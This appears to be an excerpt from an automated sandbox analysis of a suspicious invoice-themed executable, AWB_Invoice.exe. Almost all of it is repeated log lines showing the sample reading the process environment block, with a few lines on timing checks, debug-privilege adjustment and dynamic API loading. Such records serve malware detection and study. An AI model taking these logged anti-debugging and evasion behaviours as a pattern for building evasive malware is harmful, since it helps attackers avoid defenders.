      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_6F612351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6F612351
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 rdtsc 4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E588 mov eax, dword ptr fs:[00000030h]4_2_3589E588
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E588 mov eax, dword ptr fs:[00000030h]4_2_3589E588
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A580 mov eax, dword ptr fs:[00000030h]4_2_3585A580
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A580 mov eax, dword ptr fs:[00000030h]4_2_3585A580
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35859580 mov eax, dword ptr fs:[00000030h]4_2_35859580
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35859580 mov eax, dword ptr fs:[00000030h]4_2_35859580
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF582 mov eax, dword ptr fs:[00000030h]4_2_358DF582
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35852594 mov eax, dword ptr fs:[00000030h]4_2_35852594
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AC592 mov eax, dword ptr fs:[00000030h]4_2_358AC592
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358C7591 mov edi, dword ptr fs:[00000030h]4_2_358C7591
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A85AA mov eax, dword ptr fs:[00000030h]4_2_358A85AA
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358245B0 mov eax, dword ptr fs:[00000030h]4_2_358245B0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358245B0 mov eax, dword ptr fs:[00000030h]4_2_358245B0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585C5C6 mov eax, dword ptr fs:[00000030h]4_2_3585C5C6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F5C7 mov eax, dword ptr fs:[00000030h]4_2_3581F5C7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F5C7 mov eax, dword ptr fs:[00000030h]4_2_3581F5C7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F5C7 mov eax, dword ptr fs:[00000030h]4_2_3581F5C7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F5C7 mov eax, dword ptr fs:[00000030h]4_2_3581F5C7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F5C7 mov eax, dword ptr fs:[00000030h]4_2_3581F5C7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F5C7 mov eax, dword ptr fs:[00000030h]4_2_3581F5C7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F5C7 mov eax, dword ptr fs:[00000030h]4_2_3581F5C7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F5C7 mov eax, dword ptr fs:[00000030h]4_2_3581F5C7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F5C7 mov eax, dword ptr fs:[00000030h]4_2_3581F5C7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A05C6 mov eax, dword ptr fs:[00000030h]4_2_358A05C6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358565D0 mov eax, dword ptr fs:[00000030h]4_2_358565D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582B5E0 mov eax, dword ptr fs:[00000030h]4_2_3582B5E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582B5E0 mov eax, dword ptr fs:[00000030h]4_2_3582B5E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582B5E0 mov eax, dword ptr fs:[00000030h]4_2_3582B5E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582B5E0 mov eax, dword ptr fs:[00000030h]4_2_3582B5E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582B5E0 mov eax, dword ptr fs:[00000030h]4_2_3582B5E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582B5E0 mov eax, dword ptr fs:[00000030h]4_2_3582B5E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A5E7 mov ebx, dword ptr fs:[00000030h]4_2_3585A5E7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A5E7 mov eax, dword ptr fs:[00000030h]4_2_3585A5E7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358515EF mov eax, dword ptr fs:[00000030h]4_2_358515EF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A55E0 mov eax, dword ptr fs:[00000030h]4_2_358A55E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AC5FC mov eax, dword ptr fs:[00000030h]4_2_358AC5FC
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35822500 mov eax, dword ptr fs:[00000030h]4_2_35822500
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E507 mov eax, dword ptr fs:[00000030h]4_2_3584E507
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E507 mov eax, dword ptr fs:[00000030h]4_2_3584E507
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E507 mov eax, dword ptr fs:[00000030h]4_2_3584E507
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E507 mov eax, dword ptr fs:[00000030h]4_2_3584E507
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E507 mov eax, dword ptr fs:[00000030h]4_2_3584E507
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E507 mov eax, dword ptr fs:[00000030h]4_2_3584E507
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E507 mov eax, dword ptr fs:[00000030h]4_2_3584E507
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E507 mov eax, dword ptr fs:[00000030h]4_2_3584E507
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B502 mov eax, dword ptr fs:[00000030h]4_2_3581B502
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585C50D mov eax, dword ptr fs:[00000030h]4_2_3585C50D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585C50D mov eax, dword ptr fs:[00000030h]4_2_3585C50D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35841514 mov eax, dword ptr fs:[00000030h]4_2_35841514
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35841514 mov eax, dword ptr fs:[00000030h]4_2_35841514
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35841514 mov eax, dword ptr fs:[00000030h]4_2_35841514
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35841514 mov eax, dword ptr fs:[00000030h]4_2_35841514
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35841514 mov eax, dword ptr fs:[00000030h]4_2_35841514
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35841514 mov eax, dword ptr fs:[00000030h]4_2_35841514
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AC51D mov eax, dword ptr fs:[00000030h]4_2_358AC51D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov eax, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov eax, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov eax, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov eax, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov eax, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov eax, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov ecx, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov ecx, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov eax, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov eax, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov eax, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov eax, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov eax, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35851527 mov eax, dword ptr fs:[00000030h]4_2_35851527
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585F523 mov eax, dword ptr fs:[00000030h]4_2_3585F523
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35823536 mov eax, dword ptr fs:[00000030h]4_2_35823536
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35823536 mov eax, dword ptr fs:[00000030h]4_2_35823536
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581753F mov eax, dword ptr fs:[00000030h]4_2_3581753F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581753F mov eax, dword ptr fs:[00000030h]4_2_3581753F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581753F mov eax, dword ptr fs:[00000030h]4_2_3581753F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862539 mov eax, dword ptr fs:[00000030h]4_2_35862539
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583E547 mov eax, dword ptr fs:[00000030h]4_2_3583E547
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35856540 mov eax, dword ptr fs:[00000030h]4_2_35856540
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35858540 mov eax, dword ptr fs:[00000030h]4_2_35858540
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582254C mov eax, dword ptr fs:[00000030h]4_2_3582254C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358FB55F mov eax, dword ptr fs:[00000030h]4_2_358FB55F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358FB55F mov eax, dword ptr fs:[00000030h]4_2_358FB55F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EA553 mov eax, dword ptr fs:[00000030h]4_2_358EA553
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583C560 mov eax, dword ptr fs:[00000030h]4_2_3583C560
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35820485 mov ecx, dword ptr fs:[00000030h]4_2_35820485
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585648A mov eax, dword ptr fs:[00000030h]4_2_3585648A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585648A mov eax, dword ptr fs:[00000030h]4_2_3585648A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585648A mov eax, dword ptr fs:[00000030h]4_2_3585648A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585B490 mov eax, dword ptr fs:[00000030h]4_2_3585B490
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585B490 mov eax, dword ptr fs:[00000030h]4_2_3585B490
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AC490 mov eax, dword ptr fs:[00000030h]4_2_358AC490
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358224A2 mov eax, dword ptr fs:[00000030h]4_2_358224A2
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358224A2 mov ecx, dword ptr fs:[00000030h]4_2_358224A2
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AD4A0 mov ecx, dword ptr fs:[00000030h]4_2_358AD4A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AD4A0 mov eax, dword ptr fs:[00000030h]4_2_358AD4A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AD4A0 mov eax, dword ptr fs:[00000030h]4_2_358AD4A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358544A8 mov eax, dword ptr fs:[00000030h]4_2_358544A8
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B84BB mov eax, dword ptr fs:[00000030h]4_2_358B84BB
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585E4BC mov eax, dword ptr fs:[00000030h]4_2_3585E4BC
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358414C9 mov eax, dword ptr fs:[00000030h]4_2_358414C9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358414C9 mov eax, dword ptr fs:[00000030h]4_2_358414C9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358414C9 mov eax, dword ptr fs:[00000030h]4_2_358414C9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358414C9 mov eax, dword ptr fs:[00000030h]4_2_358414C9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358414C9 mov eax, dword ptr fs:[00000030h]4_2_358414C9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F4D0 mov eax, dword ptr fs:[00000030h]4_2_3584F4D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358444D1 mov eax, dword ptr fs:[00000030h]4_2_358444D1
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358444D1 mov eax, dword ptr fs:[00000030h]4_2_358444D1
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358554E0 mov eax, dword ptr fs:[00000030h]4_2_358554E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585E4EF mov eax, dword ptr fs:[00000030h]4_2_3585E4EF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585E4EF mov eax, dword ptr fs:[00000030h]4_2_3585E4EF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF4FD mov eax, dword ptr fs:[00000030h]4_2_358DF4FD
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358264F0 mov eax, dword ptr fs:[00000030h]4_2_358264F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A4F0 mov eax, dword ptr fs:[00000030h]4_2_3585A4F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A4F0 mov eax, dword ptr fs:[00000030h]4_2_3585A4F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358494FA mov eax, dword ptr fs:[00000030h]4_2_358494FA
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF409 mov eax, dword ptr fs:[00000030h]4_2_358DF409
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B6400 mov eax, dword ptr fs:[00000030h]4_2_358B6400
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B6400 mov eax, dword ptr fs:[00000030h]4_2_358B6400
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581640D mov eax, dword ptr fs:[00000030h]4_2_3581640D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35857425 mov eax, dword ptr fs:[00000030h]4_2_35857425
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35857425 mov ecx, dword ptr fs:[00000030h]4_2_35857425
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B420 mov eax, dword ptr fs:[00000030h]4_2_3581B420
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A9429 mov eax, dword ptr fs:[00000030h]4_2_358A9429
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AF42F mov eax, dword ptr fs:[00000030h]4_2_358AF42F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AF42F mov eax, dword ptr fs:[00000030h]4_2_358AF42F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AF42F mov eax, dword ptr fs:[00000030h]4_2_358AF42F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AF42F mov eax, dword ptr fs:[00000030h]4_2_358AF42F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AF42F mov eax, dword ptr fs:[00000030h]4_2_358AF42F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830445 mov eax, dword ptr fs:[00000030h]4_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830445 mov eax, dword ptr fs:[00000030h]4_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830445 mov eax, dword ptr fs:[00000030h]4_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830445 mov eax, dword ptr fs:[00000030h]4_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830445 mov eax, dword ptr fs:[00000030h]4_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830445 mov eax, dword ptr fs:[00000030h]4_2_35830445
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A0443 mov eax, dword ptr fs:[00000030h]4_2_358A0443
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585D450 mov eax, dword ptr fs:[00000030h]4_2_3585D450
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585D450 mov eax, dword ptr fs:[00000030h]4_2_3585D450
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D454 mov eax, dword ptr fs:[00000030h]4_2_3582D454
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D454 mov eax, dword ptr fs:[00000030h]4_2_3582D454
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D454 mov eax, dword ptr fs:[00000030h]4_2_3582D454
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D454 mov eax, dword ptr fs:[00000030h]4_2_3582D454
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D454 mov eax, dword ptr fs:[00000030h]4_2_3582D454
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D454 mov eax, dword ptr fs:[00000030h]4_2_3582D454
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E45E mov eax, dword ptr fs:[00000030h]4_2_3584E45E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E45E mov eax, dword ptr fs:[00000030h]4_2_3584E45E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E45E mov eax, dword ptr fs:[00000030h]4_2_3584E45E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E45E mov eax, dword ptr fs:[00000030h]4_2_3584E45E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E45E mov eax, dword ptr fs:[00000030h]4_2_3584E45E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EA464 mov eax, dword ptr fs:[00000030h]4_2_358EA464
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35828470 mov eax, dword ptr fs:[00000030h]4_2_35828470
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35828470 mov eax, dword ptr fs:[00000030h]4_2_35828470
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF478 mov eax, dword ptr fs:[00000030h]4_2_358DF478
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35851796 mov eax, dword ptr fs:[00000030h]4_2_35851796
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35851796 mov eax, dword ptr fs:[00000030h]4_2_35851796
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E79D mov eax, dword ptr fs:[00000030h]4_2_3589E79D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358207A7 mov eax, dword ptr fs:[00000030h]4_2_358207A7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358ED7A7 mov eax, dword ptr fs:[00000030h]4_2_358ED7A7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358ED7A7 mov eax, dword ptr fs:[00000030h]4_2_358ED7A7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358ED7A7 mov eax, dword ptr fs:[00000030h]4_2_358ED7A7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F17BC mov eax, dword ptr fs:[00000030h]4_2_358F17BC
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF7CF mov eax, dword ptr fs:[00000030h]4_2_358DF7CF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E7E0 mov eax, dword ptr fs:[00000030h]4_2_3584E7E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358237E4 mov eax, dword ptr fs:[00000030h]4_2_358237E4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358277F9 mov eax, dword ptr fs:[00000030h]4_2_358277F9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358277F9 mov eax, dword ptr fs:[00000030h]4_2_358277F9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582D700 mov ecx, dword ptr fs:[00000030h]4_2_3582D700
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B705 mov eax, dword ptr fs:[00000030h]4_2_3581B705
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B705 mov eax, dword ptr fs:[00000030h]4_2_3581B705
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B705 mov eax, dword ptr fs:[00000030h]4_2_3581B705
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B705 mov eax, dword ptr fs:[00000030h]4_2_3581B705
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E970B mov eax, dword ptr fs:[00000030h]4_2_358E970B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E970B mov eax, dword ptr fs:[00000030h]4_2_358E970B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584270D mov eax, dword ptr fs:[00000030h]4_2_3584270D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584270D mov eax, dword ptr fs:[00000030h]4_2_3584270D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584270D mov eax, dword ptr fs:[00000030h]4_2_3584270D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582471B mov eax, dword ptr fs:[00000030h]4_2_3582471B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582471B mov eax, dword ptr fs:[00000030h]4_2_3582471B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF717 mov eax, dword ptr fs:[00000030h]4_2_358DF717
